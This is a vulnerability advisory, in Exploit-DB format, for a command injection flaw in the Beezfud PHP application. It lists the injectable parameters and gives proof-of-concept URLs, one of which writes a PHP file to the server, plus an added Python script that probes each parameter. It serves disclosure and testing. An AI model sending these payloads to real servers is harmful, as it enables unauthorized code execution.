Beezfud - Remote Code Execution

Author: Ashiyane Digital Security Team
type: webapps
platform: php
port: 80
date_added: 2015-12-24  
date_updated: 2015-12-26  
verified: 0  
codes: OSVDB-132294  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.combeezfud-master.zip  

raw file: 39093.txt  
================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php

# PoC :

http://localhost/beezfud/index.php?parameter=;Command;

The parameter value reaches a shell unsanitised: the leading ';' terminates the
application's own command and 'Command' is then executed with the privileges of
the web server process. The same injection works through any of the following
parameters.

Vulnerable Parameters : lookback, max, range, latest, earliest


Example :

http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo(); ?>' >info.php;

This drops info.php into the working directory of the process that runs the
command; requesting it afterwards confirms that the injected command executed.
When the request is built by hand (curl, a script) rather than typed into a
browser, percent-encode the payload: the spaces, quotes, '<' and '>' in the
line above are not valid in a raw query string.
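The following script is an added example and is not part of the advisory or of
the beezfud project. It builds a correctly percent-encoded request for each of
the five parameters listed above and sends a non-destructive probe instead of
writing a file: the probe echoes a token split by an empty pair of quotes
(which the shell concatenates), so a reflected copy of the raw parameter
cannot be mistaken for real command output. The base URL and parameter names
come from the advisory; the probe command, token handling and detection logic
are this script's own.

```python
#!/usr/bin/env python3
"""Added example: build percent-encoded test URLs for the Beezfud command
injection and check responses for an echoed probe token."""
import secrets
import sys
import urllib.parse
import urllib.request

# Injectable parameters exactly as listed in the advisory.
VULNERABLE_PARAMS = ("lookback", "max", "range", "latest", "earliest")

# Target from the advisory's PoC (assumes a local install; adjust as needed).
DEFAULT_BASE = "http://localhost/beezfud/index.php"


def marker_payload(token):
    """Non-destructive probe in the advisory's ';Command;' shape.

    The token is split by '' (two single quotes): a shell concatenates
    abc''def into abcdef, whereas a page that merely reflects the raw
    parameter value still shows the quotes, so the joined token only
    appears in the response if the command really ran."""
    half = len(token) // 2
    return f";echo {token[:half]}''{token[half:]};"


def build_poc_url(base, param, command):
    """Percent-encode the command into the query string.

    The literal PoC in the advisory contains spaces, quotes, '<', '>' and
    '?', all of which must be encoded when the request is built by hand."""
    query = urllib.parse.urlencode({param: command}, quote_via=urllib.parse.quote)
    return f"{base}?{query}"


def build_all(base, command):
    """One URL per vulnerable parameter, keyed by parameter name."""
    return {p: build_poc_url(base, p, command) for p in VULNERABLE_PARAMS}


def injected(body, token):
    """True only if the joined token came back, i.e. the shell ran echo."""
    return token in body


def probe(base=DEFAULT_BASE, timeout=10):
    """Send one probe per parameter; returns {param: True | False | 'error: ...'}."""
    token = "bz" + secrets.token_hex(8)  # fresh per run, unlikely to occur naturally
    results = {}
    for param, url in build_all(base, marker_payload(token)).items():
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except Exception as exc:  # report transport/HTTP errors, keep going
            results[param] = f"error: {exc}"
            continue
        results[param] = injected(body, token)
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BASE
    for param, outcome in probe(target).items():
        print(f"{param:10s} {outcome}")
```

Run it as `python3 probe.py http://host/beezfud/index.php`; a True next to a
parameter means the echoed token came back through that parameter. The
advisory's original payload can still be sent with build_poc_url, which
encodes it verbatim.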

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================